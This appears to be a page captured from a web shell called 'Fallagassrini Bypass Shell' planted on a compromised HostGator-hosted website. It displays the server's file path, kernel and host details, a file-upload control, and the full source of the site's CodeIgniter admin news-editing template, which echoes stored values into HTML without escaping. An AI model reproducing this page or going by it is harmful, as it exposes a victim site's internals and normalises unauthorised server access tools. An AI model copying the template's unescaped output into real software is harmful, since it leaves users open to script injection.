? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/savoyglobal.net/application/views/admin/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/savoyglobal.net/application/views/admin/edit_news.php

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
	"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<?php
$this->load->view('admin/header');
?>

    <body>
	<?php
            $this->load->view('admin/menu');
            $this->load->view('admin/jsfunctions');

        ?>

		<div class="container_12">



         <!-- Example table -->
               <!-- Form elements -->
            <div class="grid_12">

                <div class="module">
                     <h2><span>Update News Details</span></h2>

                     <div class="module-body">
                         
                             <?php
                                echo form_open_multipart("admin/update_news");
                            ?>

                             <p>

                                <label>News Title</label>
                                <input type="text" name="news_title" value="<?=$news->news_title;?>" id="news_title"  class="input-medium" />

                            </p>
                            <p>
                                <label>Content</label>
                                <textarea name="news_content" id="news_content" class="input-medium" ><?=$news->news_content;?></textarea>
                            </p>
                         <p>

                                <label>News Target</label>
                                <input type="text" name="news_target" value="<?=$news->news_target;?>" id="news_target"  class="input-medium" />

                            </p>
                            <p>
                                <label>Date</label>
                                <input type="text" name="news_date" value="<?=$news->news_date;?>" id="news_date"  class="input-medium calfocus" />

                            </p>
                            <p>
                                <label>Thumbnail</label>
                                <img width="120" height="80" src="<?= base_url() ?>assets/uploads/news/<?= $news->news_thumbnail ?>" alt="" />
                            </p>
                             
                            <fieldset>
                                <input class="submit-green" type="submit" value="Submit" name="savep" onclick="addformdata('validateform')" />
                                <input type="hidden" name="news_id" id="news_id" value="<?=$news->news_id;?>"/>
                            </fieldset>
                       <?php form_close(); ?>
                     </div> <!-- End .module-body -->

                </div>  <!-- End .module -->
        		<div style="clear:both;"></div>
            </div> <!-- End .grid_12 -->

            <div style="clear:both;"></div>


            </div> <!-- End .container_12 -->


<?php
$this->load->view('admin/footer');
?>
        <link href="<?= base_url() ?>assets/admin/css/jquery.datepick.css" rel="stylesheet"/>
        <script src="<?= base_url("assets/admin/js/jquery.datepick.js") ?>" type="text/javascript"></script>
        <script>
            jQuery(document).ready(function() 
            {
                $('.calfocus').datepick({dateFormat: 'dd-mm-yyyy'});
            });
        </script>

	</body>
</html>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net